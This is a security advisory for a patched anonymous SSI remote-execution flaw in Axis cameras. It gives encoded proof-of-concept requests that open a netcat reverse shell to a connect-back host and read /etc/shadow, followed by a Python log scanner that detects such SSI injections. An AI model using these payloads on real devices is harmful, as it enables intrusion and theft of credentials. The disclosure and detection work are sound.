Axis SSI RCE
[STX]
Subject: SSI Remote Execute and Read Files
Researcher: bashis <mcw noemail eu> (August 2016)
Release date: October, 2017 (Old stuff that I've forgotten, fixed Q3/2016 by Axis)
Attack Vector: Remote
Authentication: Anonymous (no credentials needed)
Conditions: The cam must be configured to allow anonymous view
Execute remote commands (PoC: Connect back shell):
echo -en "GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%20<CONNECT BACK IP>%20<CONNECT BACK PORT>%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e HTTP/1.0\n\n" | ncat <TARGET IP> <TARGET PORT>
Notes:
<CONNECT BACK IP> = LHOST IP
<CONNECT BACK PORT> = LHOST PORT
<TARGET IP> = RHOST IP
<TARGET PORT> = RHOST PORT
Read remote files (PoC: Read /etc/shadow - check top of the returned output):
echo -en "GET /incl/image_test.shtml?camnbr=%3c%21--%23include%20virtual=%22../../etc/shadow%22%20--%3e HTTP/1.0\n\n" | ncat <TARGET IP> <TARGET PORT>
Notes:
<TARGET IP> = RHOST IP
<TARGET PORT> = RHOST PORT
[ETX]
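
Added example (not part of the original advisory or the researcher's code): a log check for the two request shapes above, flagging any query parameter whose URL-decoded value contains an SSI directive such as exec or include. It assumes access logs in common log format from the camera or a proxy in front of it; the sample log lines, the EXAMPLE command string and all function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Opening of a Server Side Include directive, e.g. <!--#exec or <!--#include
SSI_DIRECTIVE = re.compile(r"<!--\s*#\s*([a-z]+)", re.IGNORECASE)
# Request field of a common-log-format line (assumed log format)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')

def decode_fully(value, rounds=3):
    """URL-decode repeatedly in case the logger or a proxy encoded the value again."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def ssi_in_query(query):
    """Return [(parameter, directive), ...] for SSI directives found in a query string."""
    hits = []
    for pair in query.split("&"):
        name, _, value = pair.partition("=")  # split on the first '=' only
        for match in SSI_DIRECTIVE.finditer(decode_fully(value)):
            hits.append((name, match.group(1).lower()))
    return hits

def scan(log_lines):
    """Return [(client, path, parameter, directive), ...] for suspicious requests."""
    findings = []
    for line in log_lines:
        match = REQUEST.search(line)
        if not match:
            continue
        path, _, query = match.group(1).partition("?")
        client = line.split(" ", 1)[0]
        for name, directive in ssi_in_query(query):
            findings.append((client, path, name, directive))
    return findings

# Constructed sample log lines (documentation address range 192.0.2.0/24)
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Oct/2017:10:00:00 +0000] "GET /incl/image_test.shtml?camnbr=1 HTTP/1.0" 200 512',
    '192.0.2.66 - - [01/Oct/2017:10:00:05 +0000] "GET /incl/image_test.shtml?camnbr=%3c%21--%23include%20virtual=%22../../etc/shadow%22%20--%3e HTTP/1.0" 200 1024',
    '192.0.2.66 - - [01/Oct/2017:10:00:09 +0000] "GET /incl/image_test.shtml?camnbr=%3C%21--%23exec%20cmd=%22EXAMPLE%22%20--%3E HTTP/1.0" 200 300',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print("SSI directive in request: client=%s path=%s param=%s directive=%s" % finding)
```

A legitimate viewer never needs to send an SSI directive in camnbr, so any hit on an internet-facing camera that allows anonymous view is worth investigating.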